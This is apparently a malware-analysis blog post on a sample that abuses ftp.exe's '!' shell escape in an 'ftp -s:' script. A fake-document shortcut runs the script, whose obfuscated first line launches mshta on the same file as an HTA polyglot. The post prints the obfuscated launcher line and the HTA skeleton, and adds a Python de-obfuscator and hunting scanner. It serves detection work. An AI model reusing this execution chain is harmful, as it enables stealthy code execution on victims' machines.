This is not a particularly novel technique, so nothing here should come as a surprise.
I saw a malware sample on the Kanxue forum that uses FTP to execute malicious code. "ftp -s:filename" tells ftp.exe to read its commands from the given text file, and within that script a line beginning with the "!" sign is the escape to the shell: ftp.exe hands the rest of the line to cmd.exe for execution.
Command execution via a disguised shortcut
The sample is disguised as a document but is actually a shortcut whose target runs ftp.exe with a script file. The malicious command is hidden in that file: its first line starts with ftp's built-in "!" escape, which passes the remainder of the line to the shell. That remainder is obfuscated with cmd.exe environment-variable substring expansion: %ProgramData:~3,1% and %ProgramData:~5,1% pick the "P" and "o" out of C:\ProgramData, and %windir:~-1,1% picks the trailing "s" of C:\Windows, so the line resolves to
Powershell.exe mshta.exe '%cd%\ccc.dat'
with %cd% being the working directory the shortcut starts in. PowerShell launches mshta.exe, which loads ccc.dat as an HTA and runs the VBScript inside it. The same file therefore does double duty: ftp.exe reports the HTML lines as invalid commands and carries on, while mshta.exe's lenient HTML parser ignores the stray "!" line at the top. The VBScript then drops a benign decoy document, drc.docx, to C:\ProgramData\drc.docx and opens it, so the victim sees a normal document.
The command the shortcut runs:
ftp -s:ccc.dat
Contents of ccc.dat (the VBScript body is elided as XXXXX):
! %ProgramData:~3,1%%ProgramData:~5,1%wer%windir:~-1,1%hell.exe m%windir:~-1,1%hta.exe '%cd%\ccc.dat'
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
<script type="text/vbscript">
XXXXX
</script>
</head>
<body>
</body>
</html>
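To see what the obfuscated "!" line actually hands to cmd.exe, here is an added example of my own (not code from the original post or from the sample) that reimplements cmd.exe's %VAR:~start,len% substring and %VAR:str1=str2% replacement expansion in Python and scans an "ftp -s:" script for shell-escape lines. The environment values for ProgramData, windir and especially the dynamic %cd% are assumed defaults for the demonstration, not values captured from an infected host, and the ccc.dat polyglot is reconstructed from the listing above with the VBScript body omitted.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed environment approximating a default Windows install. These are
# assumptions for the demo, not values captured from the infected host; %cd%
# in particular is dynamic and simply reflects wherever the shortcut started.
ENV: Dict[str, str] = {
    "ProgramData": r"C:\ProgramData",
    "windir": r"C:\Windows",
    "cd": r"C:\Users\victim\Desktop",
}

# %NAME% or %NAME:modifier%, where the modifier is ~start[,len] or str1=str2
TOKEN_RE = re.compile(r"%([^%:]+)(?::([^%]*))?%")
SUBSTR_RE = re.compile(r"^~(-?\d+)(?:,(-?\d+))?$")


def cmd_substring(value: str, start: int, length: Optional[int]) -> str:
    """Mimic cmd.exe %VAR:~start,len%: a negative start counts from the end,
    a negative len stops that many characters before the end."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if start >= n:
        return ""
    if length is None:
        return value[start:]
    end = n + length if length < 0 else start + length
    return value[start:end] if end > start else ""


def cmd_replace(value: str, spec: str) -> str:
    """Mimic cmd.exe %VAR:str1=str2% (case-insensitive, all occurrences) and
    %VAR:*str1=str2% (replace everything up to and including the first str1)."""
    pattern, repl = spec.split("=", 1)
    if pattern.startswith("*"):
        needle = pattern[1:]
        idx = value.lower().find(needle.lower())
        return value if idx < 0 else repl + value[idx + len(needle):]
    return re.sub(re.escape(pattern), lambda _m: repl, value, flags=re.IGNORECASE)


def expand(line: str, env: Dict[str, str] = ENV) -> str:
    """Expand %VAR% tokens in one shell line the way cmd.exe does at a command
    prompt. Variable names are case-insensitive; unknown variables and
    unrecognised modifiers are left literal (inside a .bat an unknown variable
    would instead expand to nothing)."""
    lookup = {k.lower(): v for k, v in env.items()}

    def repl(m):
        value = lookup.get(m.group(1).lower())
        mod = m.group(2)
        if value is None:
            return m.group(0)
        if mod is None:
            return value
        sub = SUBSTR_RE.match(mod)
        if sub:
            length = int(sub.group(2)) if sub.group(2) is not None else None
            return cmd_substring(value, int(sub.group(1)), length)
        if "=" in mod and mod.split("=", 1)[0] not in ("", "*"):
            return cmd_replace(value, mod)
        return m.group(0)

    return TOKEN_RE.sub(repl, line)


def shell_escapes(script: str, env: Dict[str, str] = ENV) -> List[Tuple[str, str]]:
    """Scan an 'ftp -s:' command script for lines that escape to the shell via
    the built-in '!' command; return (raw line, de-obfuscated command) pairs."""
    hits = []
    for raw in script.splitlines():
        stripped = raw.lstrip()
        if stripped.startswith("!"):
            hits.append((raw, expand(stripped[1:].strip(), env)))
    return hits


# The polyglot ccc.dat from the post, reconstructed with the VBScript body
# omitted: line 1 is the ftp shell escape, the rest is the HTA that mshta runs.
OBFUSCATED_LINE = (
    "! %ProgramData:~3,1%%ProgramData:~5,1%wer%windir:~-1,1%hell.exe "
    "m%windir:~-1,1%hta.exe '%cd%\\ccc.dat'"
)
CCC_DAT = OBFUSCATED_LINE + """
<!DOCTYPE html>
<html><head>
<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" />
<script type="text/vbscript"></script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for raw, decoded in shell_escapes(CCC_DAT):
        print("raw:    ", raw)
        print("decoded:", decoded)
```

Run against the reconstructed ccc.dat, the single "!" line decodes to Powershell.exe mshta.exe '<working directory>\ccc.dat'. The same scanner is a reasonable hunting aid: any "ftp -s:" script that contains a "!" line at all deserves a look, and de-obfuscating the environment-variable slicing up front saves staring at %windir:~-1,1% in a sandbox log.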